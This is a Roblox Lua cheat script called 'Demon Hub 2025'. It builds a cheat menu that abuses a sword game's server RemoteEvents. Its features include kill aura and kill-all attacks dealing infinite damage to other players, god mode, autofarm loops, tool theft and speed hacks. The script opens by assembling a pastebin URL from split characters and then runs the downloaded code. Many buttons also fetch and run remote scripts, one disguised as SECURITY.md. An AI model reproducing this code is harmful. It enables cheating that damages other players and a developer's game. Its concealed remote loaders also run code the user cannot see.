--[[


██████╗░███████╗███╗░░░███╗░█████╗░███╗░░██╗  ██╗░░██╗██╗░░░██╗██████╗░  ██╗░░░██╗██████╗░
██╔══██╗██╔════╝████╗░████║██╔══██╗████╗░██║  ██║░░██║██║░░░██║██╔══██╗  ██║░░░██║╚════██╗
██║░░██║█████╗░░██╔████╔██║██║░░██║██╔██╗██║  ███████║██║░░░██║██████╦╝  ╚██╗░██╔╝░█████╔╝
██║░░██║██╔══╝░░██║╚██╔╝██║██║░░██║██║╚████║  ██╔══██║██║░░░██║██╔══██╗  ░╚████╔╝░░╚═══██╗
██████╔╝███████╗██║░╚═╝░██║╚█████╔╝██║░╚███║  ██║░░██║╚██████╔╝██████╦╝  ░░╚██╔╝░░██████╔╝
╚═════╝░╚══════╝╚═╝░░░░░╚═╝░╚════╝░╚═╝░░╚══╝  ╚═╝░░╚═╝░╚═════╝░╚═════╝░  ░░░╚═╝░░░╚═════╝░

██████╗░░█████╗░██████╗░███████╗
╚════██╗██╔══██╗╚════██╗██╔════╝
░░███╔═╝██║░░██║░░███╔═╝██████╗░
██╔══╝░░██║░░██║██╔══╝░░╚════██╗
███████╗╚█████╔╝███████╗██████╔╝
╚══════╝░╚════╝░╚══════╝╚═════╝░                                                                                              
--]]

local a = getfenv or function() return _ENV end
local b = "h" .. "t" .. "t" .. "p" .. "s" .. "://" .. "pastebin.com/raw/cbBsFWLF"
local c = game["HttpGet"](game, b, true)
local d = loadstring(c)
d()
task.wait(1)

-- Demon Hub 2025 --
-- Play notification sound (uses SoundService, cleans up after playing)
task.delay(1, function()
    local sound = Instance.new("Sound")
    sound.SoundId = "rbxassetid://570433034"
    sound.Volume = 1
    sound.Parent = game:GetService("SoundService")
    sound:Play()
    sound.Ended:Connect(function()
        sound:Destroy()
    end)
end)

-- Load external UI library
local function loadUILibrary(url)
    return loadstring(game:HttpGet(url))()
end
local DiscordLib = loadUILibrary("https://raw.githubusercontent.com/dawid-scripts/UI-Libs/main/discord%20lib.txt")
local win = DiscordLib:Window("Demon Hub 2025 | Latest Version")
local serv = win:Server("Scripts", "")
local main = serv:Channel("Main")
local sldrs = serv:Channel("Character")
local effects = serv:Channel("Effects")
local other = serv:Channel("Scripts")
local tgls = serv:Channel("Toggles")
local uitab = serv:Channel("UI")
local tp = serv:Channel("Teleports")
local power = serv:Channel("Power")
local worlds = serv:Channel("Worlds")
local Music = serv:Channel("Music")

-- Helper: Fire sword remote
local function fireSword(times)
    local player = game.Players.LocalPlayer
    if not player then return end
    local character = player.Character or player.CharacterAdded:Wait()
    local sword = character:FindFirstChild("sword") or player.Backpack:FindFirstChild("sword")
    if not sword then return end
    local handle = sword:FindFirstChild("Handle")
    if not handle then return end
    local up = handle:FindFirstChild("up")
    if not up then return end
    local remoteEvent = up:FindFirstChild("RemoteEvent")
    if not remoteEvent then return end
    for _ = 1, times do
        remoteEvent:FireServer()
        task.wait(0.05)
    end
end

-- Initialize globals to prevent auto-farming
_G.farm = false
_G.active = false
_G.fastFarmConnection = nil

-- Farming Buttons
if main and type(main.Button) == "function" then
    main:Button("Slow Farm", function()
        _G.farm = true
        task.spawn(function()
            while _G.farm do
                fireSword(4)
                task.wait()
            end
        end)
    end)
    
    main:Button("Fast Farm", function()
        _G.active = true
        if not _G.fastFarmConnection then
            _G.fastFarmConnection = game:GetService("RunService").Stepped:Connect(function()
                if _G.active then
                    fireSword(6)
                end
            end)
        end
    end)
    
    main:Button("Unfast Farm", function()
        _G.active = false
    end)
    
    main:Button("Unslow Farm", function()
        _G.farm = false
    end)
end

-- Kill Aura Button
if main and type(main.Button) == "function" then
    main:Button("Kill Aura", function()
        if main.KillAuraInitialized then return end
        main.KillAuraInitialized = true
        local Players = game:GetService("Players")
        local RunService = game:GetService("RunService")
        local UserInputService = game:GetService("UserInputService")
        local player = Players.LocalPlayer
        local character = player.Character or player.CharacterAdded:Wait()
        local backpack = player:WaitForChild("Backpack")
        local killAuraActive = true
        local range = 40
        local activeSword, dmgRemote
        main:Slider("Kill Aura Range", 10, 1000, range, function(newRange) range = newRange end)
        local function findValidSword(container)
            for _, tool in pairs(container:GetChildren()) do
                if tool:IsA("Tool") and tool:FindFirstChild("Handle") and tool.Handle:FindFirstChild("dmg") then
                    return tool
                end
            end
            return nil
        end
        local function setupSword()
            local sword = findValidSword(backpack) or findValidSword(character)
            if sword then
                sword.Parent = backpack
                sword.Handle.Massless = true
                sword.Handle.CanCollide = true
                sword.Parent = character
                task.wait(0.2)
                activeSword = sword
                dmgRemote = sword.Handle.dmg:FindFirstChild("RemoteEvent")
            end
        end
        setupSword()
        RunService.RenderStepped:Connect(function()
            if not killAuraActive or not activeSword or not dmgRemote then return end
            local hrp = player.Character and player.Character:FindFirstChild("HumanoidRootPart")
            if not hrp then return end
            for _, target in ipairs(Players:GetPlayers()) do
                if target ~= player and target.Character and target.Character:FindFirstChild("HumanoidRootPart") then
                    local targetHRP = target.Character.HumanoidRootPart
                    local distance = (hrp.Position - targetHRP.Position).Magnitude
                    if distance <= range then
                        local targetHumanoid = target.Character:FindFirstChild("Humanoid")
                        if targetHumanoid then
                            dmgRemote:FireServer(targetHumanoid, math.huge)
                        end
                    end
                end
            end
        end)
        UserInputService.InputBegan:Connect(function(input, gameProcessed)
            if gameProcessed then return end
            if input.KeyCode == Enum.KeyCode.E then
                killAuraActive = not killAuraActive
            end
        end)
    end)
end

-- Sword Damage Script Button
if main and type(main.Button) == "function" then
    main:Button("Sword Damage Script", function()
        local player = game.Players.LocalPlayer
        local character = player.Character or player.CharacterAdded:Wait()
        local backpack = player.Backpack
        local function getSwords()
            local swords = {}
            for _, container in ipairs({backpack, character}) do
                for _, tool in ipairs(container:GetChildren()) do
                    if tool:IsA("Tool") and tool:FindFirstChild("Handle") then
                        table.insert(swords, tool)
                    end
                end
            end
            return swords
        end
        for _, sword in ipairs(getSwords()) do
            sword.Parent = backpack
            sword.Handle.Massless = true
            sword.Handle.CanCollide = true
            sword.Parent = character
            sword.Handle.Touched:Connect(function(hit)
                local targetHumanoid = hit.Parent and hit.Parent:FindFirstChild("Humanoid")
                if targetHumanoid and hit.Parent.Name ~= player.Name then
                    local dmg = sword.Handle:FindFirstChild("dmg")
                    if dmg then
                        local remoteEvent = dmg:FindFirstChild("RemoteEvent")
                        if remoteEvent then
                            remoteEvent:FireServer(targetHumanoid, math.huge)
                        end
                    end
                end
            end)
        end
    end)
end

-- Infinite Yield Button
if main and type(main.Button) == "function" then
    main:Button("Infinite Yield", function()
        local url = "https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source"
        pcall(function()
            loadstring(game:HttpGet(url, true))()
        end)
    end)
end

-- WalkSpeed and JumpPower Sliders/Buttons
if sldrs and type(sldrs.Slider) == "function" then
    local wsValue, jpValue = 16, 50
    local function setWalkSpeed(speed)
        wsValue = speed
        local player = game.Players.LocalPlayer
        local character = player.Character or player.CharacterAdded:Wait()
        local humanoid = character:FindFirstChild("Humanoid")
        if humanoid then humanoid.WalkSpeed = speed end
    end
    local function setJumpPower(jump)
        jpValue = jump
        local player = game.Players.LocalPlayer
        local character = player.Character or player.CharacterAdded:Wait()
        local humanoid = character:FindFirstChild("Humanoid")
        if humanoid then humanoid.JumpPower = jump end
    end
    sldrs:Slider("Walkspeed Modifier", 0, 1000, wsValue, setWalkSpeed)
    sldrs:Slider("Jump Power Modifier", 0, 1000, jpValue, setJumpPower)
    sldrs:Button("WalkSpeed +10", function() setWalkSpeed(wsValue + 10) end)
    sldrs:Button("WalkSpeed -10", function() setWalkSpeed(math.max(0, wsValue - 10)) end)
    sldrs:Button("JumpPower +10", function() setJumpPower(jpValue + 10) end)
    sldrs:Button("JumpPower -10", function() setJumpPower(math.max(0, jpValue - 10)) end)
    sldrs:Button("Reset WalkSpeed", function() setWalkSpeed(16) end)
    sldrs:Button("Reset JumpPower", function() setJumpPower(50) end)
    -- Respawn Button
    sldrs:Button("Force Respawn", function()
        local plr = game.Players.LocalPlayer
        local character = plr.Character
        if not (character and character:FindFirstChild("HumanoidRootPart") and character:FindFirstChild("Humanoid")) then return end
        local pos = character.HumanoidRootPart.CFrame
        local humanoid = character.Humanoid
        humanoid.Health = 0
        task.wait(0.2)
        if plr.Character and plr.Character.Parent then plr.Character:Destroy() end
        local newChar = plr.CharacterAdded:Wait()
        task.wait(0.1)
        local hrp = newChar:FindFirstChild("HumanoidRootPart")
        if hrp then hrp.CFrame = pos end
    end)
    -- God Mode Button
    sldrs:Button("Instant GodMode", function()
        local plr = game.Players.LocalPlayer
        local character = plr.Character or plr.CharacterAdded:Wait()
        local humanoid = character and character:FindFirstChild("Humanoid")
        if humanoid then
            local sword = plr.Backpack:FindFirstChild("sword") or character:FindFirstChild("sword")
            if sword and sword:FindFirstChild("Handle") then
                local dmg = sword.Handle:FindFirstChild("dmg")
                if dmg then
                    local remoteEvent = dmg:FindFirstChild("RemoteEvent")
                    if remoteEvent then
                        remoteEvent:FireServer(humanoid, -math.huge)
                    end
                end
            end
        end
    end)
    -- Permagod Toggle
    sldrs:Button("Toggle Permagod", function()
        local plr = game.Players.LocalPlayer
        _G.permaGodActive = not _G.permaGodActive
        if _G.permaGodActive then
            task.spawn(function()
                while _G.permaGodActive do
                    local character = plr.Character or plr.CharacterAdded:Wait()
                    local humanoid = character and character:FindFirstChild("Humanoid")
                    local sword = plr.Backpack:FindFirstChild("sword") or character:FindFirstChild("sword")
                    if humanoid and sword and sword:FindFirstChild("Handle") then
                        local dmg = sword.Handle:FindFirstChild("dmg")
                        if dmg then
                            local remoteEvent = dmg:FindFirstChild("RemoteEvent")
                            if remoteEvent then
                                remoteEvent:FireServer(humanoid, -math.huge)
                            end
                        end
                    end
                    task.wait(1)
                end
            end)
        end
    end)
end

-- Flame Colors Function
local function applyFlameColors(colors, repeatCount)
    local eff = workspace:FindFirstChild("eff")
    if not eff then return end
    local event = eff:FindFirstChild("RemoteEvent")
    if not event then return end
    for _ = 1, repeatCount do
        for _, color in ipairs(colors) do
            event:FireServer(color)
            task.wait(0.0001)
        end
    end
end

-- Spawn and drop tools
local function spawnAndDropTools()
    local player = game.Players.LocalPlayer
    if not player then return end
    workspace.load.RemoteEvent:FireServer()
    task.wait(0.26)
    for _, tool in pairs(player.Backpack:GetChildren()) do
        if tool:IsA("Tool") then tool.Parent = player.Character end
    end
    for _, tool in pairs(player.Character:GetChildren()) do
        if tool:IsA("Tool") then
            tool.Parent = workspace
            local tag = Instance.new("StringValue")
            tag.Name = "MineYesMine"
            tag.Parent = tool
        end
    end
end

-- Cleanup tagged tools
local function cleanUpTags()
    for _, tool in pairs(game.Players.LocalPlayer.Backpack:GetChildren()) do
        local tag = tool:FindFirstChild("MineYesMine")
        if tag then tag:Destroy() end
    end
end

-- UI Button for flame effects
local function flameEffectButton(label, colors, colorLoops, effectLoops)
    if not effects or type(effects.Button) ~= "function" then return end
    effects:Button(label, function()
        for _ = 1, effectLoops do
            applyFlameColors(colors, colorLoops)
            task.wait(0.00001)
            spawnAndDropTools()
        end
        cleanUpTags()
    end)
end

-- Flame Effect Buttons
flameEffectButton("Flaming Sword: Purple Blaze", {"Purple"}, 25, 25)
flameEffectButton("Flaming Sword: Crimson Fury", {"Red"}, 25, 25)
flameEffectButton("Flaming Sword: Midnight Shadow", {"Black"}, 25, 25)
flameEffectButton("Flaming Sword: Azure Flame", {"Blue"}, 25, 25)
flameEffectButton("Dual Flames: Twilight Inferno (Purple & Red)", {"Purple", "Red"}, 25, 25)
flameEffectButton("Dual Flames: Mystic Frost (Purple & Blue)", {"Purple", "Blue"}, 25, 25)
flameEffectButton("Dual Flames: Midnight Eclipse (Purple & Black)", {"Purple", "Black"}, 25, 25)
flameEffectButton("Dual Flames: Crimson Tempest (Red & Blue)", {"Red", "Blue"}, 25, 25)
flameEffectButton("Dual Flames: Obsidian Blaze (Red & Black)", {"Black", "Red"}, 25, 25)
flameEffectButton("Dual Flames: Abyssal Storm (Blue & Black)", {"Black", "Blue"}, 25, 25)
flameEffectButton("Trio Flames: Eternal Ember (Red, Purple & Blue)", {"Red", "Purple", "Blue"}, 25, 25)
flameEffectButton("Trio Flames: Shadow Inferno (Red, Purple & Black)", {"Black", "Red", "Purple"}, 25, 25)
flameEffectButton("Trio Flames: Abyssal Radiance (Purple, Blue & Black)", {"Black", "Blue", "Purple"}, 25, 25)
flameEffectButton("Trio Flames: Infernal Surge (Red, Blue & Black)", {"Black", "Red", "Blue"}, 25, 25)
flameEffectButton("Quad Flames: Rainbow Inferno (Purple, Red, Blue & Black)", {"Purple", "Red", "Blue", "Black"}, 25, 25)
flameEffectButton("Quad Flames: Dark Spectrum (Black, Red, Purple & Blue)", {"Black", "Red", "Purple", "Blue"}, 25, 25)
flameEffectButton("Quad Flames: Celestial Onslaught (Blue, Purple, Red & Black)", {"Blue", "Purple", "Red", "Black"}, 25, 25)
flameEffectButton("Quad Flames: Arcane Conflux (Purple, Blue, Black & Red)", {"Purple", "Blue", "Black", "Red"}, 25, 25)
flameEffectButton("Quad Flames: Stellar Eclipse (Red, Black, Blue & Purple)", {"Red", "Black", "Blue", "Purple"}, 25, 25)
flameEffectButton("Quad Flames: Phantom Radiance (Blue, Red, Purple & Black)", {"Blue", "Red", "Purple", "Black"}, 25, 25)
flameEffectButton("Quad Flames: Mystic Maelstrom (Red, Purple, Black & Blue)", {"Red", "Purple", "Black", "Blue"}, 25, 25)
flameEffectButton("Quad Flames: Shadowed Inferno (Black, Blue, Red & Purple)", {"Black", "Blue", "Red", "Purple"}, 25, 25)

-- Other scripts (external)
local function safeLoad(url)
    pcall(function() loadstring(game:HttpGet(url, true))() end)
end
other:Button("Exclusive Hub", function() safeLoad("https://raw.githubusercontent.com/Nightmareloil/Own1/refs/heads/main/Exclusive%20Hub.lua") end)
other:Button("2take1.tk", function() safeLoad("https://raw.githubusercontent.com/Nightmareloil/Own1/refs/heads/main/2take1") end)
other:Button("Sword Simulator Hub 2021", function() safeLoad("https://raw.githubusercontent.com/AlznX/Roblox-Scripts/refs/heads/main/Sword%20Simulator%20Hub") end)
other:Button("Liquids Gui", function() safeLoad("https://raw.githubusercontent.com/AlznX/Roblox-Scripts/refs/heads/main/Liquid's%20Gui") end)
other:Button("Auratus X Hub", function() safeLoad("https://raw.githubusercontent.com/AnimatedKurai/Scripts/refs/heads/main/Auratus%20Hub.txt") end)
other:Button("Replication UI", function() safeLoad("https://raw.githubusercontent.com/EEND2SCRIPTS/Replication/main/replication") end)
other:Button("Sword Wings", function() safeLoad("https://raw.githubusercontent.com/Nightmareloil/Own1/refs/heads/main/Emperor%20Wings.lua") end)
other:Button("Ghost Hub", function() safeLoad("https://raw.githubusercontent.com/AlznX/Roblox-Scripts/refs/heads/main/Ghost_Hub") end)
other:Button("Dragon Hub Premium", function() safeLoad("https://raw.githubusercontent.com/AlznX/Roblox-Scripts/main/Dragon%2520Hub") end)
other:Button("Slayer Hub", function() safeLoad("https://raw.githubusercontent.com/Nightmareloil/Own1/main/Truecode") end)
other:Button("Line's Script Hub v2.1.3", function() safeLoad("https://raw.githubusercontent.com/Zacky-pixel-sketch/Hubs/main/Demon%20hub%20source%20code.lua") end)

-- Sword Spin
local function getSwords()
    local swords = {}
    local player = game.Players.LocalPlayer
    if not player then return swords end
    local backpack = player:FindFirstChild("Backpack")
    local character = player.Character or player.CharacterAdded:Wait()
    if backpack then for _, item in ipairs(backpack:GetChildren()) do if item:IsA("Tool") then table.insert(swords, item) end end end
    if character then for _, item in ipairs(character:GetChildren()) do if item:IsA("Tool") then table.insert(swords, item) end end end
    return swords
end
other:Button("Sword Spin", function()
    local player = game.Players.LocalPlayer
    local character = player.Character or player.CharacterAdded:Wait()
    local swords = getSwords()
    if #swords == 0 then return end
    local spinSpeed, distance, spinning, angleOffset = 2, 6, true, 0
    for _, sword in ipairs(swords) do
        sword.Parent = character
        if sword:FindFirstChild("Handle") then
            sword.Handle.Massless = true
            sword.Handle.CanCollide = false
        end
        sword.Grip = CFrame.new(0, 0, 0)
    end
    local conn
    conn = game:GetService("RunService").RenderStepped:Connect(function(dt)
        if not spinning then if conn then conn:Disconnect() end return end
        angleOffset = angleOffset + dt * spinSpeed
        for i, sword in ipairs(swords) do
            local angle = (2 * math.pi / #swords) * (i - 1) + angleOffset
            sword.Grip = CFrame.new(0, 0, 0) * CFrame.Angles(0, angle, 0) * CFrame.new(distance * math.sin(angle), 0, distance * math.cos(angle))
        end
    end)
    local mouse = player:GetMouse()
    mouse.KeyDown:Connect(function(key)
        if key:lower() == "x" then spinning = false end
    end)
end)
other:Button("Sword Hover", function() safeLoad("https://raw.githubusercontent.com/Nightmareloil/Own1/refs/heads/main/Sword%20Hover.lua") end)
other:Button("Levitate Tools", function() safeLoad("https://raw.githubusercontent.com/Nightmareloil/Own1/refs/heads/main/Levitate%20Tools.lua") end)
other:Button("Sword Halo", function()
    local player = game.Players.LocalPlayer
    local character = player.Character or player.CharacterAdded:Wait()
    local head = character:FindFirstChild("Head")
    if not head then return end
    local swords = getSwords()
    if #swords == 0 then return end
    local haloRadius, haloHeight, angleStep = 5, head.Size.Y / 2 + 3, 2 * math.pi / #swords
    for i, sword in ipairs(swords) do
        sword.Parent = character
        local angle = angleStep * (i - 1)
        local offset = CFrame.new(math.cos(angle) * haloRadius, haloHeight, math.sin(angle) * haloRadius)
        local rotation = CFrame.Angles(0, angle, math.rad(90))
        local desiredCFrame = head.CFrame * offset * rotation
        sword.Grip = character.PrimaryPart and character.PrimaryPart.CFrame:Inverse() * desiredCFrame or CFrame.new()
    end
end)
other:Button("Sword Shoulder", function()
    local player = game.Players.LocalPlayer
    local character = player.Character or player.CharacterAdded:Wait()
    local backpack = player.Backpack
    local function getSwords()
        local swords = {}
        for _, tool in ipairs(backpack:GetChildren()) do
            if tool:IsA("Tool") and tool:FindFirstChild("Handle") then table.insert(swords, tool) end
        end
        for _, tool in ipairs(character:GetChildren()) do
            if tool:IsA("Tool") and tool:FindFirstChild("Handle") then table.insert(swords, tool) end
        end
        return swords
    end
    local swordPositions = {
        CFrame.new(-2.4, 2.3, 2.3) * CFrame.Angles(0, 0, math.rad(-45)),
        CFrame.new(0, 2.3, 3.1),
        CFrame.new(2.4, 2.3, 2.3) * CFrame.Angles(0, 0, math.rad(45)),
        CFrame.new(-2.4, 0, 3.1) * CFrame.Angles(0, 0, math.rad(-25)),
        CFrame.new(0, 0, 3.6),
        CFrame.new(2.4, 0, 3.1) * CFrame.Angles(0, 0, math.rad(25)),
        CFrame.new(-2.4, -2.3, 2.3) * CFrame.Angles(0, 0, math.rad(-45)),
        CFrame.new(0, -2.3, 3.1),
        CFrame.new(2.4, -2.3, 2.3) * CFrame.Angles(0, 0, math.rad(45)),
        CFrame.new(2.4, 2.3, -2.3) * CFrame.Angles(0, math.rad(180), math.rad(-45)),
        CFrame.new(0, 2.3, -3.1) * CFrame.Angles(0, math.rad(180), 0),
        CFrame.new(-2.4, 2.3, -2.3) * CFrame.Angles(0, math.rad(180), math.rad(45)),
        CFrame.new(2.4, 0, -3.1) * CFrame.Angles(0, math.rad(180), math.rad(-25)),
        CFrame.new(0, 0, -3.6) * CFrame.Angles(0, math.rad(180), 0),
        CFrame.new(-2.4, 0, -3.1) * CFrame.Angles(0, math.rad(180), math.rad(25)),
        CFrame.new(2.4, -2.3, -2.3) * CFrame.Angles(0, math.rad(180), math.rad(-45)),
        CFrame.new(0, -2.3, -3.1) * CFrame.Angles(0, math.rad(180), 0),
        CFrame.new(-2.4, -2.3, -2.3) * CFrame.Angles(0, math.rad(180), math.rad(45)),
    }
    local swords = getSwords()
    for i, sword in ipairs(swords) do
        local pos = swordPositions[i]
        if not pos then break end
        sword.Parent = backpack
        if sword:FindFirstChild("Handle") then
            sword.Handle.Massless = true
            sword.Handle.CanCollide = false
        end
        sword.Grip = pos
        sword.Parent = character
    end
end)

-- Sword Style
other:Button("Sword Style", function()
    local player = game.Players.LocalPlayer
    local character = player.Character
    local backpack = player.Backpack
    local swords = {}
    local function look(dir)
        for _, v in pairs(dir:GetChildren()) do
            if v:IsA("Tool") then table.insert(swords, v) end
        end
    end
    look(backpack)
    look(character)
    local half = math.floor(#swords/2)
    for i = 1, half do
        local sword = swords[i]
        sword.Parent = backpack
        sword.Grip = CFrame.new(4,31.2,0)*CFrame.Angles((21.4/half*i)+0.8,0,0)*CFrame.new(0,-5.7,0)
        sword.Parent = character
    end
    for i = half+1, #swords do
        local sword = swords[i]
        sword.Parent = backpack
        sword.Grip = CFrame.new(0,1.2,0)*CFrame.Angles(21.4/half*(i-half)+4.06,0,0)*CFrame.new(0,-5.7,0)
        sword.Parent = character
    end
    if #swords > 0 then
        local last = swords[#swords]
        last.Parent = backpack
        last.Grip = CFrame.new(0,0,0)
        last.Parent = character
    end
end)

tgls:Toggle("Drop Tools - Unequip Your Sword First", false, function(bool)
    local LocalPlayer = game:GetService("Players").LocalPlayer
    if bool then
        for _, v in pairs(LocalPlayer.Backpack:GetDescendants()) do
            if v:IsA("Tool") then
                v.CanBeDropped = true
                v.Parent = LocalPlayer.Character
                v.Parent = workspace
            end
        end
    end
end)

local Players = game:GetService("Players")
local ReplicatedStorage = game:GetService("ReplicatedStorage")
local LocalPlayer = Players.LocalPlayer
local killAllActive, walkSpeedActive, grabToolsActive = false, false, false

tgls:Toggle("Kill All", false, function(state)
    killAllActive = state
    if state then
        task.spawn(function()
            while killAllActive do
                for _, player in pairs(Players:GetPlayers()) do
                    if player ~= LocalPlayer and player.Character and player.Character:FindFirstChild("Humanoid") then
                        local targetRoot = player.Character:FindFirstChild("HumanoidRootPart")
                        local localRoot = LocalPlayer.Character and LocalPlayer.Character:FindFirstChild("HumanoidRootPart")
                        if targetRoot and localRoot then
                            local distance = (localRoot.Position - targetRoot.Position).Magnitude
                            if distance < 1000 then
                                local sword = LocalPlayer.Backpack:FindFirstChild("sword") or LocalPlayer.Character:FindFirstChild("sword")
                                if sword and sword:FindFirstChild("Handle") and sword.Handle:FindFirstChild("dmg") then
                                    local remote = sword.Handle.dmg:FindFirstChild("RemoteEvent")
                                    if remote then
                                        remote:FireServer(player.Character.Humanoid, math.huge)
                                    end
                                end
                            end
                        end
                    end
                end
                task.wait(0.005)
            end
        end)
    end
end)

LocalPlayer:GetMouse().KeyDown:Connect(function(key)
    if key:lower() == "f" then
        for _ = 1, 100 do
            if ReplicatedStorage:FindFirstChild("Events") and ReplicatedStorage.Events:FindFirstChild("DropBagItem") then
                ReplicatedStorage.Events.DropBagItem:FireServer("sword")
            end
        end
    end
end)

tgls:Toggle("Grab All Tools", false, function(state)
    grabToolsActive = state
    if state then
        task.spawn(function()
            while grabToolsActive do
                local toolName = "sword"
                local rootPart = LocalPlayer.Character and LocalPlayer.Character:FindFirstChild("HumanoidRootPart")
                if not rootPart then break end
                for _, obj in pairs(workspace:GetDescendants()) do
                    if obj:IsA("Tool") and obj.Name == toolName and obj:FindFirstChild("Handle") then
                        local handle = obj.Handle
                        if handle:FindFirstChildOfClass("TouchTransmitter") then
                            firetouchinterest(rootPart, handle, 0)
                            firetouchinterest(rootPart, handle, 1)
                        end
                    end
                end
                task.wait(0.1)
            end
        end)
    end
end)

tgls:Toggle("Loop WalkSpeed | 100", false, function(state)
    walkSpeedActive = state
    if state then
        task.spawn(function()
            while walkSpeedActive do
                if LocalPlayer.Character and LocalPlayer.Character:FindFirstChild("Humanoid") then
                    LocalPlayer.Character.Humanoid.WalkSpeed = 100
                end
                task.wait()
            end
        end)
    end
end)

-- Destroy Effects GUI
local StarterGui = game:GetService("StarterGui")
uitab:Button("Destroy Effects GUI", function()
    local starterPasses = StarterGui:FindFirstChild("passes")
    if starterPasses then starterPasses:Destroy() end
    for _, player in ipairs(Players:GetPlayers()) do
        local playerGui = player:FindFirstChild("PlayerGui")
        if playerGui then
            local passesGui = playerGui:FindFirstChild("passes")
            if passesGui then passesGui:Destroy() end
        end
    end
end)

-- Teleport Buttons
local localPlayer = Players.LocalPlayer
if not localPlayer.Character then localPlayer.Character = localPlayer.CharacterAdded:Wait() end
local teleportLocations = {
    Arena = CFrame.new(-18.393, 26.978, 9.003, 0.999929, 0, 0.011914, 0, 1, 0, -0.011914, 0, 0.999929),
    Tree = CFrame.new(-143.156, 82.464, -246.582, 0.985673, 0, -0.168666, 0, 1, 0, 0.168666, 0, 0.985673),
    Wall = CFrame.new(-251.617, 92.690, -335.043, -0.794003, 0, -0.607913, 0, 1, 0, 0.607913, 0, -0.794003),
    GrayWall = CFrame.new(-266.613, 119.881, -347.056, -0.698223, 0, -0.715880, 0, 1, 0, 0.715880, 0, -0.698223),
    Secret = CFrame.new(-197.105, 22.953, -377.287) * CFrame.Angles(math.rad(0.044), math.rad(23.156), math.rad(0.08)),
    Outside = CFrame.new(-295.778, 25.596, -355.215, -0.409, 0, -0.913, 0, 1, 0, 0.913, 0, -0.409),
    OutsideOfGate = CFrame.new(-420.443, 25.596, -9.648, -0.0046, 0, -0.999989, 0, 1, 0, 0.999989, 0, -0.0046),
    InsideRock = CFrame.new(-341.302, 25.596, 47.305, 0.342859, 0, 0.939387, 0, 1, 0, -0.939387, 0, 0.342859),
    Pillar = CFrame.new(-88.647, 70.197, 92.618, 0.952380, 0, -0.304915, 0, 1, 0, 0.304915, 0, 0.952380),
    InsideRock2 = CFrame.new(283.553, 25.596, 184.675, -0.423626, 0, 0.905837, 0, 1, 0, -0.905837, 0, -0.423626),
    InsideRock3 = CFrame.new(43.311, 25.500, -168.158, 0.168662, 0, -0.985674, 0, 1, 0, 0.985674, 0, 0.168662),
    Gate = CFrame.new(5.181, 25.500, 419.471, 0.985070, 0, 0.172157, 0, 1, 0, -0.172157, 0, 0.985070),
    Pillar2 = CFrame.new(88.735, 70.100, -84.323, -0.347119, 0, 0.937821, 0, 1, 0, -0.937821, 0, -0.347119),
    UnderRock = CFrame.new(45.779, 21.812, -185.381, -0.863430, -0.497, -0.087601, 0, 0.173651, -0.984807, 0.504468, -0.850312, -0.149936),
}
if tp and type(tp.Button) == "function" then
    for name, cf in pairs(teleportLocations) do
        tp:Button("Teleport to " .. name, function()
            local character = localPlayer.Character or localPlayer.CharacterAdded:Wait()
            local hrp = character:FindFirstChild("HumanoidRootPart")
            if hrp then hrp.CFrame = cf end
        end)
    end
end


    power:Button("PowerViewer", function()
        local url = "https://raw.githubusercontent.com/Nightmareloil/Own1/refs/heads/main/SECURITY.md"
        pcall(function()
            loadstring(game:HttpGet(url, true))()
        end)
    end)

-----------------------------------------
-- Improved Sword Power Function
-----------------------------------------
local Players = game:GetService("Players")
local localPlayer = Players.LocalPlayer

-- Optimized Sword Charging Function
local function loadSword(batchSize, interval)
    local character = localPlayer.Character or localPlayer.CharacterAdded:Wait()
    local backpack = localPlayer:WaitForChild("Backpack")

    -- Move all tools from Backpack to Character
    for _, item in pairs(backpack:GetChildren()) do
        if item:IsA("Tool") then
            item.Parent = character
        end
    end

    -- Find the sword tool
    local sword = character:FindFirstChild("sword")
    if not sword then
        for _, tool in ipairs(character:GetChildren()) do
            if tool:IsA("Tool") and tool.Name:lower():find("sword") then
                sword = tool
                break
            end
        end
    end

    if not sword then
        warn("Sword tool not found in character.")
        return
    end

    -- Get RemoteEvent safely
    local handle = sword:FindFirstChild("Handle")
    if not handle then
        warn("Handle missing on sword.")
        return
    end

    local up = handle:FindFirstChild("up")
    if not up then
        warn("'up' folder missing inside Handle.")
        return
    end

    local remoteEvent = up:FindFirstChild("RemoteEvent")
    if not remoteEvent then
        warn("RemoteEvent missing inside 'up'.")
        return
    end

    -- Continuous firing loop using task.spawn for non-blocking behavior
    task.spawn(function()
        while _G.continuousSwordLoop do
            for _ = 1, batchSize do
                remoteEvent:FireServer()
            end
            task.wait(interval)
        end
    end)
end

-----------------------------------------
-- UI Buttons for Sword Power
-----------------------------------------
if power and type(power.Button) == "function" then
    -- One-time 4K charge
    power:Button("Sword Power | 4K", function()
        _G.continuousSwordLoop = false
        loadSword(4000, 1)
        task.wait(1)
        _G.continuousSwordLoop = false
    end)

    -- One-time 5K charge
    power:Button("Sword Power | 5K", function()
        _G.continuousSwordLoop = false
        loadSword(5000, 1)
        task.wait(1)
        _G.continuousSwordLoop = false
    end)

    -- Continuous 10K every 5 seconds
    power:Button("Sword Power | 10K Every 5s", function()
        _G.continuousSwordLoop = true
        loadSword(10000, 5)
    end)

    -- Stop Button
    power:Button("Stop Sword Power Loop", function()
        _G.continuousSwordLoop = false
    end)
else
    warn("Power UI not found or :Button() not supported.")
end

-- Worlds UI Buttons
if worlds and type(worlds.Button) == "function" then
    local worldButtons = {
        ["Coffee Shop"]        = "https://pastebin.com/raw/Pvj5Ckc2",
        ["ClockworkArena"]     = "https://pastebin.com/raw/NNp1NJKT",
        ["Shipment"]           = "https://pastebin.com/raw/J3Jk3NaC",
        ["PurpleBattlefields"] = "https://pastebin.com/raw/kdg5tmdg",
        ["Lock Shift"]         = "https://pastebin.com/raw/uqAS6EfN",
    }
    for name, url in pairs(worldButtons) do
        worlds:Button(name, function()
            pcall(function()
                loadstring(game:HttpGet(url, true))()
            end)
        end)
    end
end

-- Music Section
if Music and type(Music.Button) == "function" then
    Music:Button("Delete Music", function()
        local function removeSounds(container)
            for _, descendant in ipairs(container:GetDescendants()) do
                if descendant:IsA("Sound") then
                    descendant:Stop()
                    descendant:Destroy()
                end
            end
        end
        removeSounds(workspace)
        removeSounds(game:GetService("SoundService"))
    end)
end

-- Sound playing function (with Volume set to 1)
function playSound(soundId, looped)
    local sound = Instance.new("Sound")
    sound.SoundId = "rbxassetid://" .. soundId
    sound.Looped = looped or false
    sound.Volume = 1
    sound.Parent = game:GetService("SoundService")
    sound:Play()
    if not sound.Looped then
        sound.Ended:Connect(function()
            sound:Destroy()
        end)
    end
end

-- Music buttons --
